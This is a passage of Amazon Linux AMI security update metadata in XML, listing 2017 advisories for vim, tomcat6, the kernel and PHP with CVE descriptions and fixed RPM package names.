epoch="0" arch="x86_64"><filename>Packages/php56-gmp-5.6.30-1.133.amzn1.x86_64.rpm</filename></package><package name="php56-mcrypt" version="5.6.30" release="1.133.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-mcrypt-5.6.30-1.133.amzn1.x86_64.rpm</filename></package><package name="php56-imap" version="5.6.30" release="1.133.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-imap-5.6.30-1.133.amzn1.x86_64.rpm</filename></package><package name="php56-gd" version="5.6.30" release="1.133.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-gd-5.6.30-1.133.amzn1.x86_64.rpm</filename></package><package name="php56" version="5.6.30" release="1.133.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-5.6.30-1.133.amzn1.x86_64.rpm</filename></package><package name="php56-fpm" version="5.6.30" release="1.133.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-fpm-5.6.30-1.133.amzn1.x86_64.rpm</filename></package><package name="php56-embedded" version="5.6.30" release="1.133.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-embedded-5.6.30-1.133.amzn1.x86_64.rpm</filename></package><package name="php56-xml" version="5.6.30" release="1.133.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-xml-5.6.30-1.133.amzn1.x86_64.rpm</filename></package><package name="php56-dbg" version="5.6.30" release="1.133.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-dbg-5.6.30-1.133.amzn1.x86_64.rpm</filename></package><package name="php56-devel" version="5.6.30" release="1.133.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-devel-5.6.30-1.133.amzn1.x86_64.rpm</filename></package><package name="php56-mbstring" version="5.6.30" release="1.133.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-mbstring-5.6.30-1.133.amzn1.x86_64.rpm</filename></package><package name="php56-snmp" version="5.6.30" release="1.133.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-snmp-5.6.30-1.133.amzn1.x86_64.rpm</filename></package><package name="php56-dba" version="5.6.30" release="1.133.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-dba-5.6.30-1.133.amzn1.x86_64.rpm</filename></package><package name="php56-tidy" version="5.6.30" release="1.133.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-tidy-5.6.30-1.133.amzn1.x86_64.rpm</filename></package><package name="php56-xmlrpc" version="5.6.30" release="1.133.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-xmlrpc-5.6.30-1.133.amzn1.x86_64.rpm</filename></package><package name="php56-opcache" version="5.6.30" release="1.133.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-opcache-5.6.30-1.133.amzn1.x86_64.rpm</filename></package><package name="php56-bcmath" version="5.6.30" release="1.133.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-bcmath-5.6.30-1.133.amzn1.x86_64.rpm</filename></package><package name="php56-mssql" version="5.6.30" release="1.133.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-mssql-5.6.30-1.133.amzn1.x86_64.rpm</filename></package><package name="php56-cli" version="5.6.30" release="1.133.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-cli-5.6.30-1.133.amzn1.x86_64.rpm</filename></package><package name="php56-mysqlnd" version="5.6.30" release="1.133.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-mysqlnd-5.6.30-1.133.amzn1.x86_64.rpm</filename></package><package name="php56-pdo" version="5.6.30" release="1.133.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-pdo-5.6.30-1.133.amzn1.x86_64.rpm</filename></package><package name="php56-debuginfo" version="5.6.30" release="1.133.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-debuginfo-5.6.30-1.133.amzn1.x86_64.rpm</filename></package><package name="php56-ldap" version="5.6.30" release="1.133.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-ldap-5.6.30-1.133.amzn1.x86_64.rpm</filename></package><package name="php56-soap" version="5.6.30" release="1.133.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-soap-5.6.30-1.133.amzn1.x86_64.rpm</filename></package><package name="php56-odbc" version="5.6.30" release="1.133.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-odbc-5.6.30-1.133.amzn1.x86_64.rpm</filename></package><package name="php56-recode" version="5.6.30" release="1.133.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-recode-5.6.30-1.133.amzn1.x86_64.rpm</filename></package><package name="php56-common" version="5.6.30" release="1.133.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-common-5.6.30-1.133.amzn1.x86_64.rpm</filename></package><package name="php56-pgsql" version="5.6.30" release="1.133.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-pgsql-5.6.30-1.133.amzn1.x86_64.rpm</filename></package><package name="php56-process" version="5.6.30" release="1.133.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-process-5.6.30-1.133.amzn1.x86_64.rpm</filename></package><package name="php56-pspell" version="5.6.30" release="1.133.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-pspell-5.6.30-1.133.amzn1.x86_64.rpm</filename></package><package name="php56-mcrypt" version="5.6.30" release="1.133.amzn1" epoch="0" arch="i686"><filename>Packages/php56-mcrypt-5.6.30-1.133.amzn1.i686.rpm</filename></package><package name="php56-cli" version="5.6.30" release="1.133.amzn1" epoch="0" arch="i686"><filename>Packages/php56-cli-5.6.30-1.133.amzn1.i686.rpm</filename></package><package name="php56-pgsql" version="5.6.30" release="1.133.amzn1" epoch="0" arch="i686"><filename>Packages/php56-pgsql-5.6.30-1.133.amzn1.i686.rpm</filename></package><package name="php56-pdo" version="5.6.30" release="1.133.amzn1" epoch="0" arch="i686"><filename>Packages/php56-pdo-5.6.30-1.133.amzn1.i686.rpm</filename></package><package name="php56" version="5.6.30" release="1.133.amzn1" epoch="0" arch="i686"><filename>Packages/php56-5.6.30-1.133.amzn1.i686.rpm</filename></package><package name="php56-mbstring" version="5.6.30" release="1.133.amzn1" epoch="0" arch="i686"><filename>Packages/php56-mbstring-5.6.30-1.133.amzn1.i686.rpm</filename></package><package name="php56-recode" version="5.6.30" release="1.133.amzn1" epoch="0" arch="i686"><filename>Packages/php56-recode-5.6.30-1.133.amzn1.i686.rpm</filename></package><package name="php56-embedded" version="5.6.30" release="1.133.amzn1" epoch="0" arch="i686"><filename>Packages/php56-embedded-5.6.30-1.133.amzn1.i686.rpm</filename></package><package name="php56-soap" version="5.6.30" release="1.133.amzn1" epoch="0" arch="i686"><filename>Packages/php56-soap-5.6.30-1.133.amzn1.i686.rpm</filename></package><package name="php56-gd" version="5.6.30" release="1.133.amzn1" epoch="0" arch="i686"><filename>Packages/php56-gd-5.6.30-1.133.amzn1.i686.rpm</filename></package><package name="php56-gmp" version="5.6.30" release="1.133.amzn1" epoch="0" arch="i686"><filename>Packages/php56-gmp-5.6.30-1.133.amzn1.i686.rpm</filename></package><package name="php56-fpm" version="5.6.30" release="1.133.amzn1" epoch="0" arch="i686"><filename>Packages/php56-fpm-5.6.30-1.133.amzn1.i686.rpm</filename></package><package name="php56-tidy" version="5.6.30" release="1.133.amzn1" epoch="0" arch="i686"><filename>Packages/php56-tidy-5.6.30-1.133.amzn1.i686.rpm</filename></package><package name="php56-enchant" version="5.6.30" release="1.133.amzn1" epoch="0" arch="i686"><filename>Packages/php56-enchant-5.6.30-1.133.amzn1.i686.rpm</filename></package><package name="php56-common" version="5.6.30" release="1.133.amzn1" epoch="0" arch="i686"><filename>Packages/php56-common-5.6.30-1.133.amzn1.i686.rpm</filename></package><package name="php56-mssql" version="5.6.30" release="1.133.amzn1" epoch="0" arch="i686"><filename>Packages/php56-mssql-5.6.30-1.133.amzn1.i686.rpm</filename></package><package name="php56-dbg" version="5.6.30" release="1.133.amzn1" epoch="0" arch="i686"><filename>Packages/php56-dbg-5.6.30-1.133.amzn1.i686.rpm</filename></package><package name="php56-bcmath" version="5.6.30" release="1.133.amzn1" epoch="0" arch="i686"><filename>Packages/php56-bcmath-5.6.30-1.133.amzn1.i686.rpm</filename></package><package name="php56-imap" version="5.6.30" release="1.133.amzn1" epoch="0" arch="i686"><filename>Packages/php56-imap-5.6.30-1.133.amzn1.i686.rpm</filename></package><package name="php56-snmp" version="5.6.30" release="1.133.amzn1" epoch="0" arch="i686"><filename>Packages/php56-snmp-5.6.30-1.133.amzn1.i686.rpm</filename></package><package name="php56-devel" version="5.6.30" release="1.133.amzn1" epoch="0" arch="i686"><filename>Packages/php56-devel-5.6.30-1.133.amzn1.i686.rpm</filename></package><package name="php56-xml" version="5.6.30" release="1.133.amzn1" epoch="0" arch="i686"><filename>Packages/php56-xml-5.6.30-1.133.amzn1.i686.rpm</filename></package><package name="php56-opcache" version="5.6.30" release="1.133.amzn1" epoch="0" arch="i686"><filename>Packages/php56-opcache-5.6.30-1.133.amzn1.i686.rpm</filename></package><package name="php56-pspell" version="5.6.30" release="1.133.amzn1" epoch="0" arch="i686"><filename>Packages/php56-pspell-5.6.30-1.133.amzn1.i686.rpm</filename></package><package name="php56-debuginfo" version="5.6.30" release="1.133.amzn1" epoch="0" arch="i686"><filename>Packages/php56-debuginfo-5.6.30-1.133.amzn1.i686.rpm</filename></package><package name="php56-mysqlnd" version="5.6.30" release="1.133.amzn1" epoch="0" arch="i686"><filename>Packages/php56-mysqlnd-5.6.30-1.133.amzn1.i686.rpm</filename></package><package name="php56-intl" version="5.6.30" release="1.133.amzn1" epoch="0" arch="i686"><filename>Packages/php56-intl-5.6.30-1.133.amzn1.i686.rpm</filename></package><package name="php56-ldap" version="5.6.30" release="1.133.amzn1" epoch="0" arch="i686"><filename>Packages/php56-ldap-5.6.30-1.133.amzn1.i686.rpm</filename></package><package name="php56-odbc" version="5.6.30" release="1.133.amzn1" epoch="0" arch="i686"><filename>Packages/php56-odbc-5.6.30-1.133.amzn1.i686.rpm</filename></package><package name="php56-dba" version="5.6.30" release="1.133.amzn1" epoch="0" arch="i686"><filename>Packages/php56-dba-5.6.30-1.133.amzn1.i686.rpm</filename></package><package name="php56-process" version="5.6.30" release="1.133.amzn1" epoch="0" arch="i686"><filename>Packages/php56-process-5.6.30-1.133.amzn1.i686.rpm</filename></package><package name="php56-xmlrpc" version="5.6.30" release="1.133.amzn1" epoch="0" arch="i686"><filename>Packages/php56-xmlrpc-5.6.30-1.133.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2017-809</id><title>Amazon Linux AMI 2014.03 - ALAS-2017-809: low priority package update for vim</title><issued date="2017-03-29 16:45:00" /><updated date="2017-03-29 21:43:00" /><severity>low</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2017-6350:
An integer overflow flaw was found in the way vim handled tree length values when reading an undo file. This bug could result in vim crashing when trying to process corrupted undo files.
1427945:
CVE-2017-6350 vim: Integer overflow at an unserialize_uep memory allocation site
CVE-2017-6349:
An integer overflow flaw was found in the way vim handled undo files. This bug could result in vim crashing when trying to process corrupted undo files.
1427944:
CVE-2017-6349 vim: Integer overflow at a u_read_undo memory allocation site
CVE-2017-5953:
vim before patch 8.0.0322 does not properly validate values for tree length when handling a spell file, which may result in an integer overflow at a memory allocation site and a resultant buffer overflow.
1421613:
CVE-2017-5953 vim: Tree length values not validated properly when handling a spell file
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5953" title="" id="CVE-2017-5953" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6349" title="" id="CVE-2017-6349" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6350" title="" id="CVE-2017-6350" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="vim-enhanced" version="8.0.0503" release="1.45.amzn1" epoch="2" arch="x86_64"><filename>Packages/vim-enhanced-8.0.0503-1.45.amzn1.x86_64.rpm</filename></package><package name="vim-filesystem" version="8.0.0503" release="1.45.amzn1" epoch="2" arch="x86_64"><filename>Packages/vim-filesystem-8.0.0503-1.45.amzn1.x86_64.rpm</filename></package><package name="vim-debuginfo" version="8.0.0503" release="1.45.amzn1" epoch="2" arch="x86_64"><filename>Packages/vim-debuginfo-8.0.0503-1.45.amzn1.x86_64.rpm</filename></package><package name="vim-common" version="8.0.0503" release="1.45.amzn1" epoch="2" arch="x86_64"><filename>Packages/vim-common-8.0.0503-1.45.amzn1.x86_64.rpm</filename></package><package name="vim-minimal" version="8.0.0503" release="1.45.amzn1" epoch="2" arch="x86_64"><filename>Packages/vim-minimal-8.0.0503-1.45.amzn1.x86_64.rpm</filename></package><package name="vim-debuginfo" version="8.0.0503" release="1.45.amzn1" epoch="2" arch="i686"><filename>Packages/vim-debuginfo-8.0.0503-1.45.amzn1.i686.rpm</filename></package><package name="vim-enhanced" version="8.0.0503" release="1.45.amzn1" epoch="2" arch="i686"><filename>Packages/vim-enhanced-8.0.0503-1.45.amzn1.i686.rpm</filename></package><package name="vim-minimal" version="8.0.0503" release="1.45.amzn1" epoch="2" arch="i686"><filename>Packages/vim-minimal-8.0.0503-1.45.amzn1.i686.rpm</filename></package><package name="vim-filesystem" version="8.0.0503" release="1.45.amzn1" epoch="2" arch="i686"><filename>Packages/vim-filesystem-8.0.0503-1.45.amzn1.i686.rpm</filename></package><package name="vim-common" version="8.0.0503" release="1.45.amzn1" epoch="2" arch="i686"><filename>Packages/vim-common-8.0.0503-1.45.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2017-810</id><title>Amazon Linux AMI 2014.03 - ALAS-2017-810: medium priority package update for tomcat6</title><issued date="2017-03-29 16:48:00" /><updated date="2017-03-29 22:51:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2016-8745:
1403824:
CVE-2016-8745 tomcat: information disclosure due to incorrect Processor sharing
CVE-2016-6816:
It was discovered that the code that parsed the HTTP request line permitted invalid characters. This could be exploited, in conjunction with a proxy that also permitted the invalid characters but with a different interpretation, to inject data into the HTTP response. By manipulating the HTTP response the attacker could poison a web-cache, perform an XSS attack, or obtain sensitive information from requests other then their own.
1397484:
CVE-2016-6816 tomcat: HTTP Request smuggling vulnerability due to permitting invalid character in HTTP requests
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-6816" title="" id="CVE-2016-6816" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-8745" title="" id="CVE-2016-8745" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2017:0527.html" title="" id="RHSA-2017:0527" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="tomcat6-webapps" version="6.0.51" release="1.10.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat6-webapps-6.0.51-1.10.amzn1.noarch.rpm</filename></package><package name="tomcat6" version="6.0.51" release="1.10.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat6-6.0.51-1.10.amzn1.noarch.rpm</filename></package><package name="tomcat6-jsp-2.1-api" version="6.0.51" release="1.10.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat6-jsp-2.1-api-6.0.51-1.10.amzn1.noarch.rpm</filename></package><package name="tomcat6-servlet-2.5-api" version="6.0.51" release="1.10.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat6-servlet-2.5-api-6.0.51-1.10.amzn1.noarch.rpm</filename></package><package name="tomcat6-lib" version="6.0.51" release="1.10.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat6-lib-6.0.51-1.10.amzn1.noarch.rpm</filename></package><package name="tomcat6-el-2.1-api" version="6.0.51" release="1.10.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat6-el-2.1-api-6.0.51-1.10.amzn1.noarch.rpm</filename></package><package name="tomcat6-docs-webapp" version="6.0.51" release="1.10.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat6-docs-webapp-6.0.51-1.10.amzn1.noarch.rpm</filename></package><package name="tomcat6-admin-webapps" version="6.0.51" release="1.10.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat6-admin-webapps-6.0.51-1.10.amzn1.noarch.rpm</filename></package><package name="tomcat6-javadoc" version="6.0.51" release="1.10.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat6-javadoc-6.0.51-1.10.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2017-811</id><title>Amazon Linux AMI 2014.03 - ALAS-2017-811: important priority package update for kernel</title><issued date="2017-03-29 17:59:00" /><updated date="2017-03-29 22:53:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2017-7184:
CVE-2017-6347:
The skbs processed by ip_cmsg_recv() are not guaranteed to be linear (e.g. when sending UDP packets over loopback with MSGMORE). Using csum_partial() on potentially the whole skb len is dangerous; instead be on the safe side and use skb_checksum(). This may lead to an infoleak as the kernel memory may be checksummed and sent as part of the packet.
1427984:
CVE-2017-6347 kernel: ipv4: Incorrect IP_CHECKSUM handling
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6347" title="" id="CVE-2017-6347" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-7184" title="" id="CVE-2017-7184" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="kernel-debuginfo" version="4.4.51" release="40.60.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-4.4.51-40.60.amzn1.x86_64.rpm</filename></package><package name="kernel-tools" version="4.4.51" release="40.60.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-4.4.51-40.60.amzn1.x86_64.rpm</filename></package><package name="perf-debuginfo" version="4.4.51" release="40.60.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-debuginfo-4.4.51-40.60.amzn1.x86_64.rpm</filename></package><package name="kernel" version="4.4.51" release="40.60.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-4.4.51-40.60.amzn1.x86_64.rpm</filename></package><package name="kernel-headers" version="4.4.51" release="40.60.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-headers-4.4.51-40.60.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-devel" version="4.4.51" release="40.60.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-devel-4.4.51-40.60.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="4.4.51" release="40.60.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-devel-4.4.51-40.60.amzn1.x86_64.rpm</filename></package><package name="perf" version="4.4.51" release="40.60.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-4.4.51-40.60.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.4.51" release="40.60.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-debuginfo-4.4.51-40.60.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-x86_64" version="4.4.51" release="40.60.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-common-x86_64-4.4.51-40.60.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-devel" version="4.4.51" release="40.60.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-devel-4.4.51-40.60.amzn1.i686.rpm</filename></package><package name="kernel-devel" version="4.4.51" release="40.60.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-devel-4.4.51-40.60.amzn1.i686.rpm</filename></package><package name="kernel-headers" version="4.4.51" release="40.60.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-headers-4.4.51-40.60.amzn1.i686.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.4.51" release="40.60.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-debuginfo-4.4.51-40.60.amzn1.i686.rpm</filename></package><package name="kernel" version="4.4.51" release="40.60.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-4.4.51-40.60.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo" version="4.4.51" release="40.60.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-4.4.51-40.60.amzn1.i686.rpm</filename></package><package name="perf" version="4.4.51" release="40.60.amzn1" epoch="0" arch="i686"><filename>Packages/perf-4.4.51-40.60.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo-common-i686" version="4.4.51" release="40.60.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-common-i686-4.4.51-40.60.amzn1.i686.rpm</filename></package><package name="kernel-tools" version="4.4.51" release="40.60.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-4.4.51-40.60.amzn1.i686.rpm</filename></package><package name="perf-debuginfo" version="4.4.51" release="40.60.amzn1" epoch="0" arch="i686"><filename>Packages/perf-debuginfo-4.4.51-40.60.amzn1.i686.rpm</filename></package><package name="kernel-doc" version="4.4.51" release="40.60.amzn1" epoch="0" arch="noarch"><filename>Packages/kernel-doc-4.4.51-40.60.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2017-812</id><title>Amazon Linux AMI 2014.03 - ALAS-2017-812: medium priority package update for php70</title><issued date="2017-03-29 20:15:00" /><updated date="2017-03-29 22:49:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2017-5340:
Zend/zend_hash.c in PHP before 7.0.15 and 7.1.x before 7.1.1 mishandles certain cases that require large array allocations, which allows remote attackers to execute arbitrary code or cause a denial of service (integer overflow, uninitialized memory access, and use of arbitrary destructor function pointers) via crafted serialized data.
1412631:
CVE-2017-5340 php: Use of uninitialized memory in unserialize()
CVE-2016-7479:
In all versions of PHP 7, during the unserialization process, resizing the &#039;properties&#039; hash table of a serialized object may lead to use-after-free. A remote attacker may exploit this bug to gain arbitrary code execution.
1412686:
CVE-2016-7479 php: Use-after-free vulnerability when resizing the 'properties' hash table of a serialized object
CVE-2016-10168:
Integer overflow in gd_io.c in the GD Graphics Library (aka libgd) before 2.2.4 allows remote attackers to have unspecified impact via vectors involving the number of horizontal and vertical chunks in an image.
1418986:
CVE-2016-10168 gd: Integer overflow in gd_io.c
CVE-2016-10167:
The gdImageCreateFromGd2Ctx function in gd_gd2.c in the GD Graphics Library (aka libgd) before 2.2.4 allows remote attackers to cause a denial of service (application crash) via a crafted image file.
1418984:
CVE-2016-10167 gd: DoS vulnerability in gdImageCreateFromGd2Ctx()
CVE-2016-10162:
The php_wddx_pop_element function in ext/wddx/wddx.c in PHP 7.0.x before 7.0.15 and 7.1.x before 7.1.1 allows remote attackers to cause a denial of service (NULL pointer dereference and application crash) via an inapplicable class name in a wddxPacket XML document, leading to mishandling in a wddx_deserialize call.
1419012:
CVE-2016-10162 php: Null pointer dereference when unserializing PHP object
CVE-2016-10161:
The object_common1 function in ext/standard/var_unserializer.c in PHP before 5.6.30, 7.0.x before 7.0.15, and 7.1.x before 7.1.1 allows remote attackers to cause a denial of service (buffer over-read and application crash) via crafted serialized data that is mishandled in a finish_nested_data call.
1419010:
CVE-2016-10161 php: Out-of-bounds heap read on unserialize in finish_nested_data()
CVE-2016-10160:
Off-by-one error in the phar_parse_pharfile function in ext/phar/phar.c in PHP before 5.6.30 and 7.0.x before 7.0.15 allows remote attackers to cause a denial of service (memory corruption) or possibly execute arbitrary code via a crafted PHAR archive with an alias mismatch.
1419018:
CVE-2016-10160 php: Off-by-one error in phar_parse_pharfile when loading crafted phar archive
CVE-2016-10159:
Integer overflow in the phar_parse_pharfile function in ext/phar/phar.c in PHP before 5.6.30 and 7.0.x before 7.0.15 allows remote attackers to cause a denial of service (memory consumption or application crash) via a truncated manifest entry in a PHAR archive.
1419020:
CVE-2016-10159 php: Integer overflow in phar_parse_pharfile
CVE-2016-10158:
It was found that the exif_convert_any_to_int() function in PHP was vulnerable to floating point exceptions when parsing tags in image files. A remote attacker with the ability to upload a malicious image could crash PHP, causing a Denial of Service.
1419015:
CVE-2016-10158 php: Wrong calculation in exif_convert_any_to_int function
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-10158" title="" id="CVE-2016-10158" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-10159" title="" id="CVE-2016-10159" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-10160" title="" id="CVE-2016-10160" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-10161" title="" id="CVE-2016-10161" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-10162" title="" id="CVE-2016-10162" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-10167" title="" id="CVE-2016-10167" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-10168" title="" id="CVE-2016-10168" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7479" title="" id="CVE-2016-7479" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5340" title="" id="CVE-2017-5340" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="php70-process" version="7.0.16" release="1.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-process-7.0.16-1.21.amzn1.x86_64.rpm</filename></package><package name="php70-opcache" version="7.0.16" release="1.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-opcache-7.0.16-1.21.amzn1.x86_64.rpm</filename></package><package name="php70-xml" version="7.0.16" release="1.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-xml-7.0.16-1.21.amzn1.x86_64.rpm</filename></package><package name="php70-xmlrpc" version="7.0.16" release="1.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-xmlrpc-7.0.16-1.21.amzn1.x86_64.rpm</filename></package><package name="php70-cli" version="7.0.16" release="1.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-cli-7.0.16-1.21.amzn1.x86_64.rpm</filename></package><package name="php70-intl" version="7.0.16" release="1.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-intl-7.0.16-1.21.amzn1.x86_64.rpm</filename></package><package name="php70-tidy" version="7.0.16" release="1.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-tidy-7.0.16-1.21.amzn1.x86_64.rpm</filename></package><package name="php70-common" version="7.0.16" release="1.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-common-7.0.16-1.21.amzn1.x86_64.rpm</filename></package><package name="php70-bcmath" version="7.0.16" release="1.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-bcmath-7.0.16-1.21.amzn1.x86_64.rpm</filename></package><package name="php70-zip" version="7.0.16" release="1.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-zip-7.0.16-1.21.amzn1.x86_64.rpm</filename></package><package name="php70-gd" version="7.0.16" release="1.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-gd-7.0.16-1.21.amzn1.x86_64.rpm</filename></package><package name="php70-pspell" version="7.0.16" release="1.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-pspell-7.0.16-1.21.amzn1.x86_64.rpm</filename></package><package name="php70-ldap" version="7.0.16" release="1.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-ldap-7.0.16-1.21.amzn1.x86_64.rpm</filename></package><package name="php70-pdo" version="7.0.16" release="1.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-pdo-7.0.16-1.21.amzn1.x86_64.rpm</filename></package><package name="php70-snmp" version="7.0.16" release="1.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-snmp-7.0.16-1.21.amzn1.x86_64.rpm</filename></package><package name="php70-mbstring" version="7.0.16" release="1.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-mbstring-7.0.16-1.21.amzn1.x86_64.rpm</filename></package><package name="php70-soap" version="7.0.16" release="1.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-soap-7.0.16-1.21.amzn1.x86_64.rpm</filename></package><package name="php70-mcrypt" version="7.0.16" release="1.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-mcrypt-7.0.16-1.21.amzn1.x86_64.rpm</filename></package><package name="php70-recode" version="7.0.16" release="1.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-recode-7.0.16-1.21.amzn1.x86_64.rpm</filename></package><package name="php70-json" version="7.0.16" release="1.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-json-7.0.16-1.21.amzn1.x86_64.rpm</filename></package><package name="php70-dbg" version="7.0.16" release="1.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-dbg-7.0.16-1.21.amzn1.x86_64.rpm</filename></package><package name="php70-odbc" version="7.0.16" release="1.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-odbc-7.0.16-1.21.amzn1.x86_64.rpm</filename></package><package name="php70-gmp" version="7.0.16" release="1.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-gmp-7.0.16-1.21.amzn1.x86_64.rpm</filename></package><package name="php70" version="7.0.16" release="1.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-7.0.16-1.21.amzn1.x86_64.rpm</filename></package><package name="php70-fpm" version="7.0.16" 